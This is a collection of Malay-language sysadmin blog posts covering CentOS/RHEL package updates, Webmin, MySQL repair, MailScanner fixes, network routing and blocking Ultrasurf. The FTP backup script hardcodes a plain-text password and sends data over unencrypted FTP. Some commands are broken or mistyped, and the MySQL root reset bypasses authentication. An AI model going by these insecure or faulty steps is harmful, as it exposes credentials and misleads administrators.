Repo :
remi, epel, centos, rhel, rpmforge, webtatic, webmin...
Cara nak install :
1) Download semua file repo dari link ni : REPO
2) Download semua file PKI dari link ni : PKI
3) Extract file repo dan copy semua file repo tu guna winscp ke dalam folder '/etc/yum.repos.d'
4) Extract file pki dan copy semua file pki tu guna winscp ke dalam folder '/etc/pki/rpm-gpg'

Cara nak update patch atau package tu command nye simpel je.
Tapi ni aku nak terang cara guna webmin untuk setup peringatan sekiranya ada package atau patch terbaru perlu di kemaskini pada sevrer Linux anda.

1) Jika Server anda tiada webmin, install la dulu.
> yum webmin
2) Buka webmin guna firefox atau IE di url http://:10000
3) Login ke dalam webmin
4) Pergi ke menu System > Software Package Updates
Gambar contoh seperti di bawah :

5) Sila isikan ruang di bawah 'scheduled checking options'
Check for updates on schedule? - Pilih Yes dan pilih sama ada terima secara harian, mingguan atau setiap jam
Email updates report to - Masukkan emel yang akan diterima oleh server admin agar beliau tahu ada package atau patch baru perlu dikemaskini. Boleh masuk banyak emel dan dipisahkan menggunakan koma (,)
Action when update needed - Boleh pilih ikut pilihan jenis update yang dikehendaki. Aku pilih 'Install Security Updates' sebab aku rasa yang penting pastikan linux server aku secure dari vulnerable.
6) Dah sudah tu pilih SAVE.
7) Sekiranya anda pilih makluman secara harian, maka setiap hari anda akan terima emel dari server memaklumkan bahawa package atau patch apa perlu dikemaskini.
8) Anda boleh update semua package dan patch tu gunakan webmin dari menu tu, tapi aku suggest elok gunakan command line
9) Login ke server guna putty.
10) Run command tersebut dan seterusnya ikut arahan diberi :
> yum update
11) Sekiranya ada patch / package tak boleh install atas sebab tertentu maka run command berikut. (contohnya semua update perl tanak update) :
> yum --exclude perl* update
12) Done, semoga berjaya!

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

How to create backup data to local and send to backup server through FTP

2010-07-08T15:46:00.000+08:00

Kali ni aku nak share cara mudah utk buat backup data ke local dan seterusnya hantar pula ke backup server menggunakan FTP.

OS : CentOS / RHEL
Aplikasi diperlukan : ncftp 3.2.2-1, webmin 1.5.10, repo EPEL enabled

1) Assume webmin dah ada install kat dalam server tu
2) Untuk install ncftp. Pilih yes untuk install.
> yum install ncftp*
1050 packages excluded due to repository priority protections
Setting up Install Process
Resolving Dependencies
--> Running transaction check
---> Package ncftp.i386 2:3.2.2-1.el5 set to be updated
---> Package ncftp-debuginfo.i386 2:3.2.2-1.el5 set to be updated
--> Finished Dependency Resolution

Dependencies Resolved

================================================================================
Package              Arch      Version               Repository           Size
================================================================================
Installing:
ncftp                i386      2:3.2.2-1.el5         epel                567 k
ncftp-debuginfo      i386      2:3.2.2-1.el5         epel-debuginfo      1.2 M

Transaction Summary
================================================================================
Install       2 Package(s)
Upgrade       0 Package(s)

Total download size: 1.7 M
Is this ok [y/N]: y

3) Connect ke server guna winscp. Create folder berikut '/data/FILESYS'
4) Di winscp, create satu file nama 'ftpfilesys.sh' di '/data' dan taip coding berikut di dalamnya, seterusnya SAVE :
# ---------------------------------------------------------------------

### System Setup ###
DIRS="/data/FILESYS"
BACKUP=/tmp/backup.$$
NOW=$(date +"%d-%m-%Y")
INCFILE="/root/tar-inc-backup.dat"
DAY=$(date +"%a")

### FTP server Setup ###
FTPD="/BKP/SVRBAIK/FILESYS//full"
FTPU="baik"
FTPP="53k51"
FTPS="192.168.0.100"
NCFTP="/usr/bin/ncftpput"
### NCFTP="$(which ncftpput)"

### Other stuff ###
EMAILID="baik@good.com"

### Start Backup for file system ###
[ ! -d $BACKUP ] && mkdir -p $BACKUP || :

### See if we want to make a full backup ###
FTPD="/BKP/SVRBAIK/FILESYS//full"
i=$(date +"%Hh%Mm%Ss")
FILE="spl-FILESYS-FULL-$NOW-$i.tar.gz"
tar -zcvf $BACKUP/$FILE $DIRS

### Dump backup using FTP ###
#Start FTP backup using ncftp
ncftp -u"$FTPU" -p"$FTPP" $FTPS<
##$NCFTP -u"$FTPU" -p"$FTPP" $FTPS<
mkdir $FTPD
mkdir $FTPD/$NOW
cd $FTPD/$NOW
lcd $BACKUP
mput *
quit
EOF

### Find out if ftp backup failed or not ###
if [ "$?" == "0" ]; then
rm -f $BACKUP/*
else
T=/tmp/backup.fail
echo "Date: $(date)">$T
echo "Hostname: $(hostname)" >>$T
echo "Backup failed" >>$T
mail -s "BACKUP FAILED : FILESYS n DB SVR PORTAL JABATAN" "$EMAILID" <$T
rm -f $T
fi
# ---------------------------------------------------------------------

5) Buka software putty dan login ke server tersebut. Taip berikut utk enable file tersebut run in linux :
> chmod u+x /data/FILESYS/ftpfilesys.sh

6) Seterusnya pada winscp juga, create file 'allfilesys.tar' di dalam '/data/FILESYS'

7) Seterusnya kita nak buat local backup kepada file 'allfilesys.tar' di dalam '/data/FILESYS'

8) Login webmin > system > filesystem backup. Masukkan ruangan directory to backup yang diinginkan. Contoh ini adalah utk backup folder sistem dalam folder '/var/www/html/baik'. Seterusnya klik Add a new backup of directory.

9) Jika nak tambah lagi folder utk dibackup boleh tetapkan dalam ruang Directories to backup tu seperti contoh berikut. Bahagian bawah backup schedule tu leh tetapkan masa utk dibuat backup data local tu. Lelain tu pepandailah. Pada kotak Backup to masukkan destinasi file allfilesys.tar yang kita dah create tadi :

10) Dah siap konfigurasi dan klik SAVE.
11) Cuba klik SAVE AND BACKUP NOW utk jalankan backup tu.
12) So local backup di server telah siap dibuat konfigurasi. Sekarang kita nak backup data ke server lain pula guna FTP.
13) Login webmin > system > Scheduled Cron Jobs. Dan pilih Create a new scheduled cron job. Paparan berikut akan keluar bersama contoh input :

14) Kotak command yang berisi info tersebut : /data/ftpfilesys.sh >/var/log/logftpfilesys 2>&1
/data/ftpfilesys.sh - file utk run command tar folder dan seterusnya ftp ke server lain
/var/log/logftpfilesys - create log file bagi aktiviti tar dan ftp file tersebut untuk memudahkan semakan kemudian jika terdapat sebarang error semasa tar atau penghantaran data melalui FTP.

15) When to execute tu bagi tujuan penentuan admin bila masa sesuai script tersebut ditrigger.

16) Klik SAVE. Seterusnya buka semula fail tersebut dan klik RUN NOW.
'no output generated' akan keluar apabila selesai aktiviti tar dan ftp.

17) Semak folder di server Backup FTP tersebut untuk pastikan data selamat tiba.

18) Selesai dah..

> Kaedah ni boleh digunakan bukan utk filesys sahaja, tetapi juga jika dump mysql data ke satu folder, maka boleh guna script tersebut untuk tar dan ftp ke server lain.
> Terima kasih pada tok guru site www.cyberciti.biz yang banyak membantu dari segi script2 tersebut.
> Bagi kerja ni, anda perlu pastikan dokumentasi waktu dibuat backup local tu dicatatkan dan lokasi backup local disimpan, seterusnya bilakah backup data dihantar ke ftp server, seterusnya lokasi simpanan backup data di ftp server.

Semoga anda juga berjaya.

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Can't open drive c:\ with double click

2010-06-24T17:20:00.001+08:00

Kali ni aku nak share cara nak enablekan semula fungsi double click pada c: @ d: drive anda yang kemungkinan hilang file tertentu disebabkan virus atau sebagainya.

Cara Pertama :
1) buka command prompt. klik start, taip pada run 'cmd' dan klik enter
2) Utk betulkan pada c:\, taip 'cd \' dan seterusnya taip berikut :
'attrib -r -s -h autorun.inf '
3) Seterusnya taip :
'del autorun.inf '
4) Nak buat untuk d: drive pulak taip 'd \' dan seterusnya ikut step 2 dan 3
5) Dah sudah restart PC

Cara Kedua :
1) Open Start > Run dan taip 'regsvr32 /i shell32.dll'
2) Klik ok
3) Mesej berikut akan diperolehi 'DllRegisterServer and DllInstall in shell32.dll succeeded'
4) Itu je anda berjaya
5) Jangan lupa restart PC

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

MySQL upgrade and crash table problem

2010-06-18T12:19:00.001+08:00

Sure bila dengar ni mesti risau giler..Aku dapat problem ni masa MailWatch aku problem dan sebabkan MailScanner takleh start. Selain tu, kerja upgrade ni perkara penting kena lakukan bagi menjaga operasi yang baik mysql server anda...tapi baca dulu apa patch dibuat pada version tersebut sekiranya melibatkan database yang besar.
-------------------------------------------------------------------------------------------
OS : RHEL 5 & CentOS 5.x

-------------------------------------------------------------------------------------------
Isu # 1 : Upgrade MySQL

Caranya :
1) # yum update mysql

2) Dah upgrade mysql lepas tu..
# mysql_upgrade -u root -p

OUTPUT : (lebih kurang berikut)
forum.phpbb_posts_text                             OK
forum.phpbb_privmsgs                               OK
forum.phpbb_privmsgs_text                          OK
forum.phpbb_ranks                                  OK
forum.phpbb_search_results                         OK
forum.phpbb_search_wordlist                        OK
forum.phpbb_search_wordmatch                       OK
forum.phpbb_sessions                               OK
forum.phpbb_sessions_keys                          OK
forum.phpbb_smilies                                OK
forum.phpbb_themes                                 OK
Running 'mysql_fix_privilege_tables'...
OK

3) Lakukan command tersebut setiap kali menjalankan kerja upgrade MYSQL.
Pada asasnya setiap kali run mysql_upgrade tu sebenarnya command berikut akan trigger :

mysqlcheck --all-databases --check-upgrade --auto-repair
mysql < fix_priv_tables

------------------------------------------------------------------------------

Isu # 2 : MySQL crash pada MailWatch

1) Terima error message berikut :
Table './mailscanner/maillog' is marked as crashed and should be repaired

2) # mysql -u root -p
mysql > REPAIR TABLE maillog USE_FRM;
mysql > exit;

3) Check web MailWatch dah kembali normal..so command REPAIR TABLE boleh digunakan sekiranya ada crash table.

-------------------------------------------------------------------------------------------

Selamat mencuba!

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Something DB Admin Need to Know About MySQL

2010-06-18T11:42:00.001+08:00

Pertamanya, aku teruja lama sangat dah tak menaip blog ICT aku ni...hehe

Ok aku nak share pengalaman aku utk resolve beberapa masalah tentang MySQL yang pernah aku hadapi.

---------------------------------------------------------------------------------------------
OS : RHEL 5 & CentOS 5.x
---------------------------------------------------------------------------------------------
Isu # 1 : Password root terlupa...biasa bagi admin yang mungkin nyanyuk atau terlalu byk variasi password yang dicipta sampaikan lupe..

Caranya :
1) Memula stop dulu mysql
> /etc/init.d/mysqld stop

OUTPUT :

Stopping MySQL database server: mysqld.

2) Seterusnya start mysql dalam safe mode
> mysqld_safe --skip-grant-tables

OUTPUT :

[1] 5988
Starting mysqld daemon with databases from /var/lib/mysql
mysqld_safe[6025]: started

3) Kendian, anda boleh login user root tanpa password
> mysql --user=root mysql

OUTPUT :

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 4.1.15-Debian_1-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

4) Lepas te taip la command berikut
mysql > update user set Password=PASSWORD('new-password') where user='root'; [ENTER]
mysql > flush privileges; [ENTER]
mysql > exit; [ENTER]

5) Lepas tu stop mysqld safe mode tadi
> /etc/init.d/mysqld stop

OUTPUT :

Stopping MySQL database server: mysqld
STOPPING server from pid file /var/run/mysqld/mysqld.pid
mysqld_safe[6186]: ended

[1]+  Done                    mysqld_safe --skip-grant-tables

6) Seterusnya start semula mysqld anda
> /etc/init.d/mysqld start

7) Selesai dah reset password root anda. Cuba test.
# mysql -u root -p

Ingat2 le lepas ni..

---------------------------------------------------------------------------------------------

Isu # 2 : Anda tergatal tangan terdelete abis satu folder default data dan file apps mysql, tapi anda selamat sebab ada backup data..

* Jangan lupa buat backup /etc/my.cnf sebelum ikut step di bawah

Caranye :

1) Anda kena buangkan dulu mysql sedia ada yang dah diinstall dalam server untuk elakkan kekeliruan :
# yum remove mysql*

2) Kendian install mysql baru
# yum install mysql-server mysql

3) Lepas dah siap install tu run command ni pulak

# chkconfig mysqld on
# /etc/init.d/mysqld start

4) Sekarang kita anggap root user anda belum ada password
# mysqladmin -u root password NEWPASSWORD

Kalau dah ada root password dan nak tukar password baru, gini lak caranya nak change

# mysqladmin -u root -p'oldpassword' password newpass

5) So skang ni aku tanak tunjuk cara nak restore DATA guna phpmyadmin sebab rasanya semua org dah tau. Aku akan tunjukkan cara untuk restore data guna command line. Memula make sure data backup tu dah ada dalam mana2 folder dalam server tadi.
# mysqladmin -u root -p
mysql > CREATE TABLE zorro;
mysql > exit;
# mysql -u root -p zorro < /data/backup/zorro.sql

6) Data anda mungkin melibatkan saiz yang teramat besar dan mungkin sampai beratus MB. Apabila try nak import file .sql yang bersaiz besar beratus MB ni, error berikut akan keluar :
(* lebih kurang) packet too large

So anda kena ubah file my.cnf bagi membolehkan import packet besar. Saiz packet paling besar leh transfer ke MySQL 5 hanyalah 1GB sahaja. Defaultnya hanya 16MB. Tapi rasanya dah mencukupi dengan saiz 1GB tu...
# nano /etc/my.cnf
copy dulu apa yang ada dalam my.cnf backup tadi ke dalam file tu.
Kendian tambah row ni kat bawah label sedia ada :
[mysqld]

set-variable = max_allowed_packet=32M

7) Restart mysql
# /etc/init.d/mysqld restart

8) Sekarang anda dah boleh import backup data yang bersaiz besau ratusan MB tu. Jika besar lagi, besarkan saiz packet allowed tu dalam my.cnf dan jgn lupa restart semula mysqld.

---------------------------------------------------------------------------------------------

Selamat berjaya!

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Another application is holding yum lock ........

2010-05-03T15:24:00.001+08:00

Kali ni aku nank short update cara-cara nak handle masalah keluar mesej another application is holding yum lock apabila kita nak install / update software menggunakan yum pada command line.

Mula-mula gunakan cara pertama ni yang aku rasa mungkin boleh dibuat disesetengah server dan mungkin tak menjadi kat sesetengah server lain. Ia bergantung kepada keliatan yum process yang sedang running tu.

1) Kenalpasti PID yum
# ps aux | grep yum
PID process adalah disebelah nama use
2) Untuk kill process yum sedia ada tu :
# kill
3) Semak semula process tu ada ke tak lagi :
# ps aux | grep yum

Berikut lak cara tambahan dari Mr Tar dari sabah :

1. # killall yum
kalu x dpt..
2. # Kill ProcessID
kalu x dpt lagi..
3. kill -9 processID (ini kill secara paksa)
kalu x dpt..
barulah try cara ketiga

Jika cara kat atas tu tak jadi di environment anda, guna cara dibawah pulak.

1) # cd /var/run/
2) # dir
Cari fail 'yum.pid' dalam folder tu
3) # rm -f yum.pid
4) # dir
Pastikan fail 'yum.pid' dah di padamkan
5) Seterusnya :
# yum update
Process update yum anda akan berfungsi semula.

Biasanya cara ketiga ni insyaAllah berjaya sebab aku try cara 1 tak berjaya, then terus ke cara ketiga.

Jika tak berjaya juga, gunalah last choice ni :
#shutdown -r now
Restart server anda, pasti lepas tu fresh semula...

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Mailscanner error Can't locate OLE/Storage_Lite.pm

2010-04-29T16:12:00.000+08:00

Sejak dari isnin lepas la, aku start update server MySpamGuard di opis. Takde org mencare ke server tu..kesian. Bapaksler slownyer. RAM 2GB, Processor 2 Unit.

Problem :
1) Slow giler nak run ssh
2) Trafik tinggi running dalam server
3) Nak buat netbackup pun ada masalah sebab masa ambil lama sangat sampai failed backup sebab load server tinggi masa dibuat backup tu

Tindakan aku :
1) Copy repo terbaik dari server RHEL dan paste dalam server MSPG dan memang sekse gile nak masuk dan menunggu loading keluar senarai file...erghh..
2) Semak spam lint test, dan log server : tail -f /var/log/messages
3) Dapati ada error dalam config : /etc/MailScanner/MailScanner.conf dan juga clamav yang outdated.
4) Review dan googling dapati clamav adalah juga antara penyebab server jadi slow sebab ada bugs dalam version sedia ada di server tu. Current version adalah 0.96, tapi server tu guna version 0.91.2
5) So buat yum update clamav (aku tak pernah buat...try je) : yum update clamav
6) Clean install dan siap update DB sekali. Aku dah seronok..tapi server masih slow..
7) Aku prepare nak update semua software dalam server tu sebab banyak yang tak pernah update
8) Aku suka guna webmin utk update software2 dlm svr linux. Senang nak review software apa perlu update patch terkini dan software apa yang available utk update tu. Aku pun ingat2 lupe gak command linux ni..
9) Update webmin (guna repo webmin) : yum update webmin
10) Selesai update aku buka webmin dan tengok kt first page tu ada summary software perlu di update kepada patch terkini...423 semuanya...!!!!
11) Aku pun klik dan klik dan update semuanya...start dari petang isnin...sehinggalah pagi Rabu barulah siap semuanya..gilos kau...nak update server yang sememangnya dah slow tu..memang mencabar.
12) Dah siap update tu semua belum laju lagi server tu. So aku restart server tu. Lepas start semula je, nak masuk ssh pun dah makin laju, nak masuk winscp pun takde masalah. Sebelum ni banyak kali gak restart server tu tapi sama je..
13) Bila dah restart tu aku tengok MailScanner unused...ALAMAK!..gile bepeloh..
14) Tengok error yang keluar macam ni :

Can't locate OLE/Storage_Lite.pm in @INC (@INC contains: /usr/lib/MailScanner /usr/lib/perl5/site_perl/5.8.8/i386-linux-thread-multi /usr/lib/perl5/site_perl/5.8.8 /usr/lib/perl5/site_perl /usr/lib/perl5/vendor_perl/5.8.8/i386-linux-thread-multi /usr/lib/perl5/vendor_perl/5.8.8 /usr/lib/perl5/vendor_perl /usr/lib/perl5/5.8.8/i386-linux-thread-multi /usr/lib/perl5/5.8.8 . /usr/lib/MailScanner) at /usr/lib/MailScanner/MailScanner/Message.pm line 51.
BEGIN failed--compilation aborted at /usr/lib/MailScanner/MailScanner/Message.pm line 51.
Compilation failed in require at /usr/sbin/MailScanner line 82

15) Fikiran bercelaru hati berdebar...giler...dari kui 10pg lepas restart tu sampaile kui 3 ptg masih belum up lagi server MYSP...masak aku kalau tak setel sebab emel luar berpusu-pusu nak masuk htr ke pengguna emel ofis aku yang glamer ni..almaklum le...geng2 tertentu ni daftar emel pejabat nak guna FACEBOOK..whats!!!..
16) So aku pun cembiasa googling cari info solution. Takde solution yang direct kepada error message aku tu. So aku saspek mesti ada kaitan dengan PERL yang aku update kt server tu. Risau takut tak compatible. Bila googling tgk seme kata takde masalah walau guna PERL versi baru pun.
17) Tengok pada error tu aku google pasal OLE/Storage_Lite dan aku try update 'perl-OLE-Storage_Lite' sebab macam dari error message tu ada kaitan dengan software tu. So : yum update perl-OLE-Storage_Lite
18) Dah siap update, aku restart semula server aku dan alhamdulillah MailScanner dah boleh start
19) Masa tu aku check dalam hold folder postfix (emel yang send dari luar akan masuk folder tu sebelum di scan). Caranya : ls -all /var/spool/postfix/hold | wc -l
20) ada mau dekat 240++ emel tengah queue tunggu nak di scan..aiyak...
21) Then aku edit config file dan masukkan senarai blacklist terbaru dalam (/etc/MailScanner/rules/spam.blacklist.conf) Kalau whitelist (/etc/MailScanner/rules/spam.whitelist.conf). Seterunsya start MailScanner : /etc/init.d/MailScanner start
22) Keluar error ni pulak tapi MailScanner dah leh start :
MailScanner: Please move your "Lockfile Dir" setting in MailScanner.conf.
It should point outside /tmp, preferably /var/spool/MailScanner/incoming/Locks
22) Tengok instruction, create folder tu :
mkdir /var/spool/MailScanner/incoming/Locks
chown postfix.postfix /var/spool/MailScanner/incoming/Locks
Ubah configuration dan MailScanner.conf
ubah dari Lockfile Dir = /tmp kepada Lockfile Dir = /var/spool/MailScanner/incoming/Locks
23) Restart semula MailScanner dan tengok log... ada error ni plak perasan :
Apr 28 11:39:51 spamsvr MailScanner[5723]: User's home directory /var/spool/postfix is not writable
Apr 28 11:39:51 spamsvr MailScanner[5723]: You need to set the "SpamAssassin User State Dir" to a directory that the "Run As User" can write to
24) So aku tukar owner kepada postfix
chown postfix.postfix /var/spool/postfix
25) Restart semula MailScanner dan tiada lagi error tu.
26) Log pun laju je check spam...fuhh alhamdulillah setel..

KESIMPULANNYA :
1) Selalulah check log sebab pasti ada hint kat situ ada yang problem
2) Selalu buat spam lint test (dalam MailWatch > Tools/Links > SpamAssassin Lint (Test))
3) Selalulah update patch server bagi software2 kecik yang running background kt server tu.
4) Selalulah patch perisian UTAMA fungsi server tu macam MYSP ni MailScanner, Spamassassin, Clamav, Postfix, MySQL, httpd.

Selamat mencuba.

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Integration EGNet and Streamyx

2010-04-28T00:15:00.001+08:00

Kali ni aku nak terangkan cara-cara nak buat integration ni.

Keperluan di lokasi Streamyx :
1) Modem streamyx + router
2) Switch
3) PC-PC Client

Keperluan EGNet
1) Firewall EGNet (jika ada lagi elok, kalau takde pun takpe cuma mcm tkde kawalan lak nk masuk EGNet dari public network)
2) Router EGNet
3) Modem EGNet

So caranya :
1) Kita dah anggap line EGNet dan Streamyx dah berjalan lancar secara berasingan tanpa ada masalah
2) So sambungkan modem + router streamyx ke switch, firewall EGNet ke switch, PC-PC ke switch.
3) Setting pada modem + router dan tetapkan routing gateway di modem tu kepada ip LAN khas untuk firewall EGNet bagi sebarang akses kepada ip sistem aplikasi EGNet.
IP sistem : 172.168.3.2
IP Gateway LAN Streamyx : 192.168.1.254
IP Firewall EGNet : 192.168.1.10
Routing apabila user akses sistem :
172.168.3.2 -> 192.168.1.254 255.255.255.0 -> 192.168.1.10

Kaedah sebegini digunakan kerana mengikut pemahaman konsep routing dan gateway.

- Setiap PC client akan ditetapkan host file IP sistem dan nama sistem berkenaan.
- Apabila PC client cuba akses kepada IP sistem tersebut, ia akan pergi ke gateway yakni modem yang juga router bagi rangkaian streamyx. Kita perasan masa setting gateway PC tu kita akan masukkan IP modem + router.
- So apabila sampai ke modem + router tu, ia akan interpret supaya setiap kali terima request akses ke IP Sistem tu, maka konfigurasi routing dlm modem + router tu akan alihkan trafik tu kepada firewallEGNet yang telah kita tetapkan ipnya sama VLAN dengan modem + router streamyx tu tadi.
- Bila dah hantar trafik ke sana, maka setellah utk terus akses ke sistem tu menggunakan EGNet.

Setting pada modem ni berbeza-beza, tapi cuba la cari kat bahagian menu routing. Anda boleh bayangkan flow routing tu dari cth di atas ni dan sesuaikan dengan konfigurasi modem + router masing-masing.

Selamat mencuba..

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Bandwidth Shaping with linux

2010-04-27T15:24:00.001+08:00

Sapa kata linux takde software untuk buat bandwith shaping. Sebelum aku terangkan antara tools linux yang ada, aku cite sikit pasal bandwidth shaping ni. Bandwidth shaping tujuannya adalah untuk kita membuat agihan bandwidth di dalam rangkaian berdasarkan aplikasi, port atau user tertentu. Tujuannya dibuat agihan ini adalah untuk memastikan bandwidth dapat digunakan sama rata mengikut kepentingan tertentu berdasarkan penetapan aplikasi, port atau user.

Kalau diikutkan sebenarnya kadangkala ada orang panggil traffic shaping, packet shaping, url shaping dan macam2 lagi. Fungsinya semua adalah sama untuk membuat agihan berdasarkan kepentingan dan bandwidth.

Contoh shaping aplikasi seperti aplikasi voip, web, video streaming, oracle, MSSQL dll
Contoh port pula seperti port 80 (http), port 21 (ftp), port 22 (ssh), ICMP (ping), port 443 (https) dll
Contoh user pula adalah agihan bandwidth berdasarkan VLAN rangkaian yang juga mewakili sekumpulan pengguna. Kalau nak direct kepada orang2 tertentu pun boleh.

Bagi Linux, sejak versi kernel 2.2 lagi memang dah ada free tools dalamnya untuk buat network trafic shaping. Sejak versi Linux kernel 2.4.2 ke atas shaping network trafic di support sepenuhnya tanpa perlu patch apa2 lagi dah.

Tools yang diperlukan kena patch tu sebenarnya hanya pakej iproute2 je.

Sesetengah menambah tcng untuk memudahkan konfigurasi.
Selain tu, penggunaan iptables dah cukup power untuk buat shaping ni. Tapi pengetahuan tentang routing dan unix command yang tinggi amat diperlukan. Tapi memang berbaloi..

So, sini aku senaraikan tools dan website untuk dirujuk :

1) IPTABLES - HERE
2) TRAFFIC CONTROL NEXT GENERATION - HERE
3) DIFFERENTIATED SERVICES ON LINUX - HERE
4) LINUX ADVANCE ROUTING AND TRAFFIC CONTROL - HERE

Namun percaya atau tidak, kebanyakan perisian atau applliance network trafic shaping ni backend dia mesti guna linux kernel. Sebab ia murah dan power.

Kalau 3COM Tipping Point IPS tu memang guna linux kernel pun backend dia sebab aku ada guna dan masa training guna command sebiji macam linux / unix (asalnya). Begitu juga dengan watchguard firewall, belakang dia pakai linux kernel juga. So tak heran la sebenarnya tak Linux hilang di dunia..ia sentiasa ada...

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Time to Setup WSUS

2010-04-19T21:44:00.001+08:00

Terima kasih kepada owner blog ni : Microsoft

Blog aku kali ni aku just translate tutorial yang blogger ni buat untuk setup WSUS. Memang setakat ni yang pernah cari pasal ni, blog ni yang paling lengkap dan begitu teliti sekali.

Sebelum tu aku terang skit apa sebenarnya WSUS. Windows Software Update Services (WSUS), adalah Alat / perisian Microsoft yang berfungsi sebagai pengurus Patch Windows. WSUS ni menggantikan Software Update Services (SUS) yang juga mempunyai fungsi yang sama.

Cara biasa update patch Windows + Microsoft :
KAEDAH 1 :
Kita biasanya dah tau pasal Automatic Updates pada setiap windows. Biasanya kalau kat pc kita memang setting default jam 3 pagi akan auto update. Kalau kita rescheduled semula ikut waktu kita available pun ok. Tu kalau guna automatic update, windows akan auto download patch baru windows dan perisian microsoft untuk di update ke pc kita. PC kita akan download patch tu menggunakan rangkaian internet.
KAEDAH 2 :
Cara lain untuk update patch kat pc kita ialah dengan pergi ke internet site www.windowsupdate.com dan terus ikut arahan next dan next untuk download patch dan update patch windows dan perisian microsoft...
KAEDAH 3 :
Setup satu server WSUS, server tu akan download semua patch windows dan microsoft terkini. Kemudian semua PC dalam rangkaian akan setkan automatic update dari server WSUS tadi. Jadi kita dapat kurangkan beban penggunaan rangkaian ke Internet dan dapat pastikan kestabilan PC sentiasa up to date patch windows + microsoft.

Cara2 nak install tu masing-masing leh tengok step by step penerangan seterusnya...aku compile masukkan dalam file PDF notanya. Mudah korang nak baca nanti...

Silalah dowload file tersebut di sini. NOTA WSUS. Mudah dengan google docs..yeah!

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

Step By Step Installation of Linux OS : OpenSUSE / CentOS / RedHat Enterprise Linux

2010-04-12T18:47:00.000+08:00

Artikel ni aku respon dari permintaan tok

OpenSuSE

Ini adalah step by step penerangan dengan bahasa ringkas dan bersama screenshot2 page installer. Amat sesuai bagi beginner.

http://en.opensuse.org/Installation#Step-by-step_guides

CentOS : 5.1

Ini adalah step by step penerangan cara untuk install CentOS 5.1, namun stepnya tak berubah bagi versi 5.4 terbaru. Masih boleh digunapakai.

http://www.howtoforge.com/installation-guide-centos5.1-desktop

RedHat

Ini adalah step by step untuk install RedHat Enterprise Linux 5. Link pertama adalah step by step penerangan menggunakan wording dan arahan tanpa gambar. Link kedua adalah step dan guidelines dari RedHat dan ada perincian didalamnya. Sesuai bagi advance users.

http://www.ehow.com/how_5150570_install-redhat-enterprise-linux.html

http://www.redhat.com/docs/manuals/enterprise/RHEL-5-manual/Installation_Guide-en-US/index.html

Selamat mencuba..

~ Be a Creator Not a User ~
http://muzzotechspot.blogspot.com
http://muzzoshah.blogspot.com

How to Block Ultrasurf

2010-04-12T17:47:00.003+08:00

Ni aku masukkan artikel as requested and mention by most of JT. Aku rasa kalau carian internet ni memang mat-mat saleh sure akan terpergi ke blog aku ni sebab topik ni memang hot kat internet. Sure bengkek je tgk org melayu punye blog...ekekeke...nk tau kena belajo melayu la...wakakaka..

Ok serius to the point. So aku dah google pasal mende ni lama dah sejak diketahui ada digunakan ultrafurf ni dalam tahun 2009. Software ni aku rasa lama dah digunakan kat negara lain. Ianya biasa digunakan oleh student dan staff ofis yang rasa terkongkong oleh polisi network di dalam rangkaian mereka gunakan. So far ISP kat malaysia ni belum filter tu semua. Jadi orang Malaysia as user current broadband tak perlu risau pasal web filtering. Tapi di China web filtering memang ketat dan dipantau oleh kerajaan sana. Sampaikan youtube pun tak lepas tengok di sana. Sekarang ni tak tahulah kot dh buka semula. Ultrasurf ni berasal dari sana atas rasa keperluan kebebasan dalam berINTERNET.

So far yang aku surf setakat ni ada la solution dari IPS dan Firewall Provider yang kata boleh blok Ultrasurf ni gunakan hash yang leh kenalpasti dari ultrasurf...tapi aku tk tau keberkesannya..

Hex ID ultrasurf : 0x1403000000101

FW yang boleh blok : SonicWall, Watchguard, Cyberfoam, SmoothWall
Solution with WatchGuard

Bagi aku, kemungkinan berjaya blok melalui Firewall ni mungkin ada. Tapi aku akan terangkan cara nak blok ultrasurf ni melalui penggunaan software dan kaedah tanpa kos...ehehhee

Info rangkaian :

Firewall : ada

Proxy : ada

Antivirus : SEP11

1) Configure di firewall anda allow akses https from subnet tertentu sahaja. Jika network guna proxy, maka allow dari ip proxy sahaja untuk akses thru https port 443

2) Ok, kenapa agaknya aku suh trim trafik ke port 443 ni. Sebabnya UltraSurf ni sebenarnya pergi ke internet menggunakan free proxy di internet yang menggunakan https. Ultrasurf create port 9666 localhost untuk buat tunnel ke port 443 tu tadi. So takde maknanya kalau kita duk block port 9666 dalam kebanyakan forum dok bagitau sebab ianya hanya digunakan di localhost sahaja utk port tu.

3) Ok tadi bila kita dah trim port https kat FW tu tadi maka kita dah sekurangnya allow akses dari ip proxy sahaja ke internet. Sekiranya PC yang guna UltraSurf ni buat default config sahaja (Proxy setting - Directly connect to Ultrasurf), so memang tak lepas dah nak connect ke https proxy tu...Tapi bagi pengguna bijak, ia akan tukar kepada auto detect proxy atau manual proxy settings. Sebab by default memang dah guna proxy di rangkaian tu sebab user takleh pergi ke internet direct. So bila user bila auto detect, ia akan cari defined proxy setting kat memana browser dalam PC tu. Jika user tau nama proxy, maka ia terus tulis je nama proxy tu dengan portnya.

4) So skang ni user masih boleh guna Ultrasurf tu kan..jangan risau, ada lagi satu cara lain lak. So memang agak susah nak blok thru Network layer ni. Cara lain boleh digunakan adalah menggunakan function dalam SEP11 yang boleh block software menggunakan hash file setiap file yang ultrasurf tersebut. Caranya adalah create hash file ultrasurf bagi version terkini dan terbelakang sikit. Masukkan dalam polisi SEP11 untuk block sebarang cubaan running software yang match dengan hash file tersebut. Walaupun nama file tu ditukar pun masih boleh detect juga menggunakan hash file tersebut. Cuma kaedah ini memerlukan pihak admin SEP11 untuk sentiasa aware bagi setiap versi baru dikeluarkan bagi perisian ultrasurf tersebut.

